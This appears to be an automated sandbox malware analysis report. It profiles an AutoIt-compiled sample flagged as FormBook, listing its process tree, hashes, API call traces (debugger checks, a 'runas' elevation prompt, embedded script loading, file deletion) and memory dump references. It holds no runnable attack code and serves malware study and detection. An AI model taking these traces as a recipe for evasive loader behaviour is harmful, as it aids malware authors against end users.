Commandline:	"C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe"
Imagebase:	0x200000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3756481473.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	22:17:38
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	165

Executed Functions

Function 00F03B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B68
IsDebuggerPresent.KERNEL32 ref: 00F03B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC52F8,00FC52E0,?,?), ref: 00F03BEB

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Part of subcall function 00F1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03C14,00FC52F8,?,?,?), ref: 00F1096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00FB7770,00000010), ref: 00F3D281
SetCurrentDirectoryW.KERNEL32(?,00FC52F8,?,?,?), ref: 00F3D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FB4260,00FC52F8,?,?,?), ref: 00F3D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00F3D346

Part of subcall function 00F03A46: GetSysColorBrush.USER32(0000000F), ref: 00F03A50
Part of subcall function 00F03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00F03A5F
Part of subcall function 00F03A46: LoadIconW.USER32(00000063), ref: 00F03A76
Part of subcall function 00F03A46: LoadIconW.USER32(000000A4), ref: 00F03A88
Part of subcall function 00F03A46: LoadIconW.USER32(000000A2), ref: 00F03A9A
Part of subcall function 00F03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AC0
Part of subcall function 00F03A46: RegisterClassExW.USER32(?), ref: 00F03B16

Part of subcall function 00F039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A03
Part of subcall function 00F039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A24
Part of subcall function 00F039D5: ShowWindow.USER32(00000000,?,?), ref: 00F03A38
Part of subcall function 00F039D5: ShowWindow.USER32(00000000,?,?), ref: 00F03A41

Part of subcall function 00F0434A: _memset.LIBCMT ref: 00F04370
Part of subcall function 00F0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F04415

Strings

runas, xrefs: 00F3D33A
This is a third-party compiled AutoIt script., xrefs: 00F3D279

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: f763156a6a41c1f56e6aab65ab348c84d834e26aa7863498cfa846c797bf470f
Instruction ID: 58f8818ea98e7db7f1f2a63290a040bdc35da97cb81f72579da7d906fe767cfd
Opcode Fuzzy Hash: f763156a6a41c1f56e6aab65ab348c84d834e26aa7863498cfa846c797bf470f
Instruction Fuzzy Hash: C651D871D0820DAEDF11EBB4ED06EFD77B9AB45B50F1040A9F411A31E2CA74A685FB21

Function 00F049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F049CD

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

GetCurrentProcess.KERNEL32(?,00F8FAEC,00000000,00000000,?), ref: 00F04A9A
IsWow64Process.KERNEL32(00000000), ref: 00F04AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F04AE7
FreeLibrary.KERNEL32(00000000), ref: 00F04AF2
GetSystemInfo.KERNEL32(00000000), ref: 00F04B23
GetSystemInfo.KERNEL32(00000000), ref: 00F04B2F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: efda276e8e26325d3369c92683c9360443975c22e153f63be5edbfdaa426ac95
Instruction ID: 3b81e6a9866c312030b8ae2c51dc6ca3a23177342d7de79c5f9b33bb0adb1ff6
Opcode Fuzzy Hash: efda276e8e26325d3369c92683c9360443975c22e153f63be5edbfdaa426ac95
Instruction Fuzzy Hash: 7B910771A897C0DECB31DB7894502AAFFF5AF29310F44499DD5C783A81D224B908F769

Function 00F04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F04D8E,?,?,00000000,00000000), ref: 00F04E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F04D8E,?,?,00000000,00000000), ref: 00F04EB0
LoadResource.KERNEL32(?,00000000,?,?,00F04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F04E2F), ref: 00F3D937
SizeofResource.KERNEL32(?,00000000,?,?,00F04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F04E2F), ref: 00F3D94C
LockResource.KERNEL32(00F04D8E,?,?,00F04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F04E2F,00000000), ref: 00F3D95F

Strings

SCRIPT, xrefs: 00F04EA6

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 56f72aa5d8f89ff87cb235edd1a3d81c6cd1795df1059f04899e10c7e2d7419c
Instruction ID: f2953feda56a5b5d119caa06bc8557039882c2155054afb0b94102bee05cf70f
Opcode Fuzzy Hash: 56f72aa5d8f89ff87cb235edd1a3d81c6cd1795df1059f04899e10c7e2d7419c
Instruction Fuzzy Hash: E7115EB5640704BFD7218B65EC48F677BBAFBC5B21F204268F505C62A0DB61E805A660

Function 00F0FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: e6331816cf9bb488166287e699e345c8e24746b1ee5e1f2e80662ea6a42ad24f
Instruction ID: 5c89c37123ff578012826ceed00c115c6b31051ebfc9cf920f1d065e48371876
Opcode Fuzzy Hash: e6331816cf9bb488166287e699e345c8e24746b1ee5e1f2e80662ea6a42ad24f
Instruction Fuzzy Hash: 10927E71908341DFD720DF14C480B6ABBE1BF89314F14892DE8999B352DBB5EC85EB92

Function 00F6445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00F3E398), ref: 00F6446A
FindFirstFileW.KERNELBASE(?,?), ref: 00F6447B
FindClose.KERNEL32(00000000), ref: 00F6448B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
Instruction ID: ca14312a5b7f04936878acb32ffb6ee8f12d057a252a96e982d03f62d59364fd
Opcode Fuzzy Hash: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
Instruction Fuzzy Hash: EAE0D8338105046F4610BB38EC0E4F9775C9E45335F100715FC35C10D0EB74A904B695

Function 00F0E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00F43E62

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 805a92a8d3e24ad4d4bf30e1455c6fa35770655ee99bf2a666f052f2fbbf13cc
Instruction ID: bb601820825d6ee9c060cace11a3c4bcc768a585511b58ebb79d445bbafed286
Opcode Fuzzy Hash: 805a92a8d3e24ad4d4bf30e1455c6fa35770655ee99bf2a666f052f2fbbf13cc
Instruction Fuzzy Hash: 88A2AD75E04209CFCB24CF54C880AAAB7B1FF58324F648869E915AB391D775ED42FB90

Function 00F109D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10A5B
timeGetTime.WINMM ref: 00F10D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10E53
Sleep.KERNEL32(0000000A), ref: 00F10E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00F10EFA
DestroyWindow.USER32 ref: 00F10F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F10F20
Sleep.KERNEL32(0000000A,?,?), ref: 00F44E83
TranslateMessage.USER32(?), ref: 00F45C60
DispatchMessageW.USER32(?), ref: 00F45C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F45C82

Strings

@COM_EVENTOBJ, xrefs: 00F454F0
@GUI_CTRLHANDLE, xrefs: 00F44FE4
@TRAY_ID, xrefs: 00F4578F
@GUI_CTRLID, xrefs: 00F44F3A
@GUI_WINHANDLE, xrefs: 00F44F8F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 04ffd65107a65d59b9db16746c552abcbc8987e8d2da6d09613a1ba23f22c060
Instruction ID: 554c9da6c79577dcf129df462b2f0e5e2ac3e52278fe5fa88c4cdbb5b2196e62
Opcode Fuzzy Hash: 04ffd65107a65d59b9db16746c552abcbc8987e8d2da6d09613a1ba23f22c060
Instruction Fuzzy Hash: F9B2E671608741DFD724DF24C885BAABBE0BF84714F14491DF949972A2DBB4E884FB82

Function 00F69155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F68F5F: __time64.LIBCMT ref: 00F68F69

Part of subcall function 00F04EE5: _fseek.LIBCMT ref: 00F04EFD

__wsplitpath.LIBCMT ref: 00F69234

Part of subcall function 00F240FB: __wsplitpath_helper.LIBCMT ref: 00F2413B

_wcscpy.LIBCMT ref: 00F69247
_wcscat.LIBCMT ref: 00F6925A
__wsplitpath.LIBCMT ref: 00F6927F
_wcscat.LIBCMT ref: 00F69295
_wcscat.LIBCMT ref: 00F692A8

Part of subcall function 00F68FA5: _memmove.LIBCMT ref: 00F68FDE
Part of subcall function 00F68FA5: _memmove.LIBCMT ref: 00F68FED

_wcscmp.LIBCMT ref: 00F691EF

Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69824
Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F69452
_wcsncpy.LIBCMT ref: 00F694C5
DeleteFileW.KERNEL32(?,?), ref: 00F694FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F69511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F69522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F69534

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: b91f0ca60ab5443bf523e89ea0cc10e2b81981b6cb6a04ff18b8c82245da7757
Instruction ID: 2942b540d3191710ec39dbb40ecd3f61bb96fb29f4630176e92cf62aba6469d7
Opcode Fuzzy Hash: b91f0ca60ab5443bf523e89ea0cc10e2b81981b6cb6a04ff18b8c82245da7757
Instruction Fuzzy Hash: AFC15EB1D04229ABDF11DF95CC81ADEB7BDEF45310F0040AAF609E7141DB74AA85AF61

Function 00F03015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F03074
RegisterClassExW.USER32(00000030), ref: 00F0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F030AF
InitCommonControlsEx.COMCTL32(?), ref: 00F030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F030DC
LoadIconW.USER32(000000A9), ref: 00F030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F03101

Strings

0, xrefs: 00F03056
AutoIt v3 GUI, xrefs: 00F03090
TaskbarCreated, xrefs: 00F030A4
+, xrefs: 00F0305D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 417b5688d97b8caa341e2dc40f517b440361035b31372e9ccbdd094b50dc3b34
Instruction ID: 3f5ea7ddc815fa35c4fa6e283fbc4e99e8677980917e156dc9f6a667342f72d5
Opcode Fuzzy Hash: 417b5688d97b8caa341e2dc40f517b440361035b31372e9ccbdd094b50dc3b34
Instruction Fuzzy Hash: C93156B1840309AFEB00CFA4EC89ADDBBF0FB09710F24452EE580E62A0D7B51589EF51

Function 00F03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F03074
RegisterClassExW.USER32(00000030), ref: 00F0309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F030AF
InitCommonControlsEx.COMCTL32(?), ref: 00F030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F030DC
LoadIconW.USER32(000000A9), ref: 00F030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F03101

Strings

0, xrefs: 00F03056
AutoIt v3 GUI, xrefs: 00F03090
TaskbarCreated, xrefs: 00F030A4
+, xrefs: 00F0305D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 21806ef964e7886c40c3e1c109d2c12b4a6850f91270222d4b64d7d64ccdb254
Instruction ID: f748a6c79b143abd3fa29584fef34d214dae7407b2e83966fc659954cb209753
Opcode Fuzzy Hash: 21806ef964e7886c40c3e1c109d2c12b4a6850f91270222d4b64d7d64ccdb254
Instruction Fuzzy Hash: 2121B4B1D1121CAFEB00DFA4ED49ADDBBF4FB08B10F10412AF511A72A0D7B15588AF91

Function 00F0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FC52F8,?,00F037AE,?), ref: 00F04724

Part of subcall function 00F2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F07165), ref: 00F2052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F3E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F3E909
RegCloseKey.ADVAPI32(?), ref: 00F3E947
_wcscat.LIBCMT ref: 00F3E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 00F0719E
\Include\, xrefs: 00F07165
\, xrefs: 00F3E9C3
Include, xrefs: 00F3E8BF, 00F3E900

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 40e83e3253719af50e7889644baab03c80a825130650a04b99593a9639fe0bb2
Instruction ID: e22e3033adc5d23dc64df56d0a23381cadd3b215658bb3f2d59774e72525ded1
Opcode Fuzzy Hash: 40e83e3253719af50e7889644baab03c80a825130650a04b99593a9639fe0bb2
Instruction Fuzzy Hash: 09714C719093059ECB04EF25ED42DABBBA8FF84360F40452EF445C72A1DB75A948FB52

Function 00F03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F03A50
LoadCursorW.USER32(00000000,00007F00), ref: 00F03A5F
LoadIconW.USER32(00000063), ref: 00F03A76
LoadIconW.USER32(000000A4), ref: 00F03A88
LoadIconW.USER32(000000A2), ref: 00F03A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AC0
RegisterClassExW.USER32(?), ref: 00F03B16

Part of subcall function 00F03041: GetSysColorBrush.USER32(0000000F), ref: 00F03074
Part of subcall function 00F03041: RegisterClassExW.USER32(00000030), ref: 00F0309E
Part of subcall function 00F03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F030AF
Part of subcall function 00F03041: InitCommonControlsEx.COMCTL32(?), ref: 00F030CC
Part of subcall function 00F03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F030DC
Part of subcall function 00F03041: LoadIconW.USER32(000000A9), ref: 00F030F2
Part of subcall function 00F03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F03101

Strings

0, xrefs: 00F03AF4
#, xrefs: 00F03AFB
AutoIt v3, xrefs: 00F03B05

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

